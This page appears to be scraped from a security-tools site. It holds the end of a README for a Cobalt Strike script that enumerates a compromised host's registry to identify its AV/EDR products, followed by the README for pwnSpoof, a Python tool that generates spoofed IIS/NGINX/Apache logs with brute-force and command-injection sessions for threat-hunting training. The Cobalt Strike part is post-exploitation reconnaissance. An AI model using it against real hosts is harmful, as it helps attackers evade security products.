Simply load reg.cna into Cobalt Strike using the Script Manager. Then right-click on the beacon you want to run registry recon on, and choose Registry then Recon, or type regenum into the beacon console.





How does this work?

Primarily, using Cobalt Strike's breg_query and breg_queryv functions. Then, all beacon output is hijacked with beacon_output, looking for specific values. When a positive match is made, the output will be highlighted in the beacon output. Since there is no beacon_output_reg or something similar, like beacon_output_ls and beacon_output_ps, all output must be captured for parsing.


What if my AV/EDR product isn't detected? / How can I help?

This is expected. We couldn't test for every AV/EDR solution, and we knew that many would be missing. You can help us out by submitting a GitHub issue including the following info:

  • If this is a System/AV/EDR entry
  • The name of the product
  • Relevant registry entries that can be used to positively ID the product


pwnSpoof - Generates realistic spoofed log files for common web servers with customisable attack scenarios

20 November 2021 at 11:30
By: Zion3R


pwnSpoof (from Punk Security) generates realistic spoofed log files for common web servers with customisable attack scenarios.

Every log bundle is unique and completely customisable, making it perfect for generating CTF scenarios and for training serials.

Can you find the attacker session and build the incident picture?


Β 

About The Project

pwnSpoof was created on the back of a threat hunting training exercise Punk Security delivered for a customer. The training exercise was to use a log analytic tool such as Splunk (other log analysing tools are available) and IIS logs to find login brute-force attacks and command injections.

The idea behind the pwnSpoof application is to;

  • Provide a quick CTF style training environment
  • Create unique logs every run
  • Test threat hunting in IIS, Apache and NGINX logs

Once you have created a set of logs, the idea is to load them in to Splunk and use various techniques to answer the following questions;

  • What was the attackers IP address and user_agent?
  • Did the attacker authenticate and if so, with what account?
  • Where was geo-location of the attacker?
  • When did the attack occur?
  • What kind of attack was it?
  • What happened during the attack?
  • What artifacts may remain on the server?
  • What steps can be taken to remediate?

Getting Started

The following will explain how to get started with pwnSpoof


Prerequisites

pwnSpoof is written in python and is tested with python3. No extra modules are needed, we only use the standard library.

If you get the following error message, please specifiy python3 when running pwnSpoof. Python2 is not supported.

  File "pwnspoof.py", line 176
print("{:6.2f}% ".format(y * x), end="\r", flush=True)
^
SyntaxError: invalid syntax

Installation
  1. Git clone the pwnSpoof repo
git clone https://github.com/punk-security/pwnspoof
  1. change directory to pwnSpoof
cd pwnspoof
  1. Run pwnSpoof
python pwnspoof.py --help

Usage

Switches
positional arguments:
{banking,wordpress,generic}
App to emulate

optional arguments:
-h, --help show this help message and exit
--out OUT Output file (default: pwnspoof.log)
--iocs Do you want to know the attackers iocs for easier searching? (default: False)

log generator settings:
--log-start-date LOG_START_DATE
Initial start of logs, in the format YYYYMMDD i.e. "20210727"
--log-end-date LOG_END_DATE
End date for logs, in the format YYYYMMDD i.e. "20210727"
--session-count SESSION_COUNT
Number of legitimate sessions to spoof (default: 2000)
--max-sessions-per-user MAX_SESSIONS_PER_USER
Max number of legitimate sessions per user (default: 3)
--server-fqdn SERVER_FQDN
Override the emulated web apps default fqdn
--server-ip SERVER_IP
Override the emulated web apps randomised IP
--server-type {IIS,NGINX,CLF}
Server to spoof (default: IIS)
--uri-file URI_FILE File containing web uris to override defaults, do not include extensions
--noise-file NOISE_FILE
File containing noise uris to override defaults, include extensions

attack settings:
--spoofed-attacks SPOOFED_ATTACKS
Number of attacker sequences to spoof (default: 1)
--attack-type {bruteforce,command_injection}
Number of attacker sequences to spoof (default: bruteforce)
--attacker-geo ATTACKER_GEO
Set the attackers geo by 2 letter region. Use RD for random (default: RD)
--attacker-user-agent ATTACKER_USER_AGENT
Set the attackers user-agent. Use RD for random (default: RD)

Examples

The following example will create a set of IIS logs for bruteforce against pwnedbank.co.uk.

python pwnspoof.py banking --server-fqdn pwnedbank.co.uk --attack-type bruteforce --server-type IIS --out iis-output.log

The following example will create a set of NGINX logs for command_injection against pwnedbank.co.uk.

python pwnspoof.py banking --server-fqdn pwnedbank.co.uk --attack-type command_injection --server-type NGINX

The following example will create a set of logs with 5000 routine sessions and 3 attack sessions

python pwnspoof.py banking --session-count 5000 --spoofed-attacks 3

The following example will create a set of logs and output the attackers IP addresses

python pwnspoof.py banking --spoofed-attacks 3 --iocs 

Demo



Road Map

pwnSpoof is built to produce to authentic web attack logs and it does this really well. Right now we are focused on refactoring the code, building out our testing suite and getting the first push to PyPi but we have huge ambitions for pwnSpoof.


Coming soon

Adding extra webapps beyond banking to provide extra variety to the logs

  • Social media
  • Wordpress
  • E-Commerce

Adding additional and more dynamic web attacks

  • Full OWASP TOP 10
  • Customisable payload encoding
  • Multi-session attacks
  • Obfuscation

Unscheduled aspirations

Training Videos!

pwnSpoof was built to be a great tool for training the blue team so it only makes sense to produce some training materials to show it off.

  • How to ingest logs in to various log analyser (Splunk, Elastic, Open Disto, Sentinel)
  • How to use the power of REGEX to pivot around the data

Not just weblogs

We would love to see pwnSpoof generating all kinds of threat hunting logs such as Office365 audit logs for Sharepoint, Onedrive and AzureAD

Blackhat Arsenal

We have submitted pwnSpoof to Blackhat Arsenal for consideration and it would be AWESOME to demo it at Blackhat London this year (2021).

Why not contact us with some extra ideas, or add to the project


Contact

Credit
  • ip2location : We make use of the IP2Location LITE Country database to provide geographically relevant IP addresses.

This product includes IP2Location LITE data available from https://lite.ip2location.com



❌